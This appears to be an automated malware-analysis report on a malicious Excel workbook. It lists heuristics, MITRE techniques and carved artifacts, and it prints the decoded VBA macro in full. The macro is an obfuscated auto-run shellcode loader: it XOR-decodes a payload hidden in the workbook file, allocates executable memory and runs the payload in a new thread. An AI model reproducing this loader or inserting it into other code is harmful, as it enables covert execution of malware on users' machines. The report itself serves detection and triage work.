Verdict: MALICIOUS
Risk Score: 78

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution

The file contains both Excel 4.0 (XLM) and VBA macros, with the VBA macros referencing Win32 API functions like VirtualAlloc and CreateThread. This suggests the macro is designed to allocate memory and execute shellcode, likely a second-stage payload. The presence of both macro types and the API calls points to downloader or dropper functionality.
Heuristics (6)

- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
  - Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: `Public Sub Document_Open()`, `oTVSpOqBmopNcGR`
  - Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched lines in script: `Sub Workbook_Open()`, `Document_Open`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes | 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4736 bytes | 3370d9f502661f379429f9a3b0fa0919b7ccd4bf634a30492dfc8fcd4b0ed494 |

xlm_macros.txt: preview script (first 1,000 lines of the extracted script)

```text
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
```

macros.bas: detection

- ClamAV: No threats found
- Obfuscation or payload: likely. 35 of 70 identifiers look randomly generated (e.g. 'zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGD') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

macros.bas: preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As LongPtr, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As LongPtr
Private Declare PtrSafe Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As LongPtr, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As LongPtr, ByVal lIYUtUgJzcn As LongPtr, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As LongPtr, ByRef SUSKHSVf As LongPtr) As LongPtr
#Else
Private Declare Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As Long, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As Long
Private Declare Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As Long, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As Long, ByVal lIYUtUgJzcn As Long, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As Long, ByRef SUSKHSVf As Long) As Long
#End If
Const mnFuhDfKvQHgUisvxL = &H1000
Const sswxspBrjhMY = &H40
Public Sub oTVSpOqBmopNcGR()
Dim TPLYmybAh() As Byte
TPLYmybAh = dFBgqsXGxAtVKCECEoiJZUEu(ActiveWorkbook.FullName)
Dim OhVBlZ As String
OhVBlZ = StrConv(TPLYmybAh, 64)
Dim dAuZnSnrpKXUGVyOXV
dAuZnSnrpKXUGVyOXV = Split(OhVBlZ, "zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGDYdlAZnpVYOzKQyJaKFkRnQVBktpWJiEFnJEdoJVwOKbnjECRdiChlOqhiJpFXtmPkTwgUFMaJOdDOHsGQyTBFwtytwVEuqzuyldphvXxvCyxLMtAqJOzALjNAXNyJhGtpIeCDdzvB")
Dim ziiQRvKnZjFLdqlYgwiGWxGX As String
Dim PjbgjZajqFy As String
Dim JIPOuyFscUpOCTUykmzSeYmEO As String
PjbgjZajqFy = StrConv(StrConv(dAuZnSnrpKXUGVyOXV(UBound(dAuZnSnrpKXUGVyOXV)), 64), 128)
JIPOuyFscUpOCTUykmzSeYmEO = Mid$(PjbgjZajqFy, 3, Len(PjbgjZajqFy))
ziiQRvKnZjFLdqlYgwiGWxGX = WJPyO("fdYWNGcvoKBZUNbqPj", JIPOuyFscUpOCTUykmzSeYmEO)
#If VBA7 Then
Dim GcpnLvPzvO As LongPtr
Dim eIhjodoRfxikPQne As LongPtr
#Else
Dim GcpnLvPzvO As Long
Dim eIhjodoRfxikPQne As Long
#End If
GcpnLvPzvO = vkaWKlhNTeWRNiTISHfF(0, Len(ziiQRvKnZjFLdqlYgwiGWxGX), mnFuhDfKvQHgUisvxL, sswxspBrjhMY)
eIhjodoRfxikPQne = NtWriteVirtualMemory(-1, GcpnLvPzvO, ziiQRvKnZjFLdqlYgwiGWxGX, Len(ziiQRvKnZjFLdqlYgwiGWxGX), 0)
eIhjodoRfxikPQne = yzyJNyjBvkeFDlPGoJTVRjIAv(0, 0, GcpnLvPzvO, 0, 0, 0)
End Sub
Public Function dFBgqsXGxAtVKCECEoiJZUEu(ByVal rsOpRbBlbNPigJQHeFQSdwTEdsjx As String) As Byte()
Dim PjbgjZajqFy As Long
Dim JIPOuyFscUpOCTUykmzSeYmEO() As Byte
PjbgjZajqFy = FreeFile
If LenB(Dir(rsOpRbBlbNPigJQHeFQSdwTEdsjx)) Then
Open rsOpRbBlbNPigJQHeFQSdwTEdsjx For Binary Access Read As PjbgjZajqFy
ReDim JIPOuyFscUpOCTUykmzSeYmEO(LOF(PjbgjZajqFy) - 1&) As Byte
Get PjbgjZajqFy, , JIPOuyFscUpOCTUykmzSeYmEO
Close PjbgjZajqFy
Else
Err.Raise 53
End If
dFBgqsXGxAtVKCECEoiJZUEu = JIPOuyFscUpOCTUykmzSeYmEO
Erase JIPOuyFscUpOCTUykmzSeYmEO
End Function
Public Sub Document_Open()
oTVSpOqBmopNcGR
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function WJPyO(ratOeQJTEfkUUnEpeBYegFNLvkZsB As String, CEgpwCzgutDFoYOsKBxGFnzJTMn As String) As String
Dim tTQrrIDGOFRbQYhEBAqPW As Long
Dim AyUUqo As String
Dim wvKoRNA As Integer, PoGKTwQZoQYni As Integer, a As Long
For tTQrrIDGOFRbQYhEBAqPW = 1 To Len(CEgpwCzgutDFoYOsKBxGFnzJTMn)
a = tTQrrIDGOFRbQYhEBAqPW Mod Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
If a = 0 Then a = Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
wvKoRNA = Asc(Mid$(CEgpwCzgutDFoYOsKBxGFnzJTMn, tTQrrIDGOFRbQYhEBAqPW, 1))
PoGKTwQZoQYni = Asc(Mid$(ratOeQJTEfkUUnEpeBYegFNLvkZsB, a, 1))
AyUUqo = AyUUqo + Chr(wvKoRNA Xor PoGKTwQZoQYni)
Next tTQrrIDGOFRbQYhEBAqPW
WJPyO = AyUUqo
End Function
```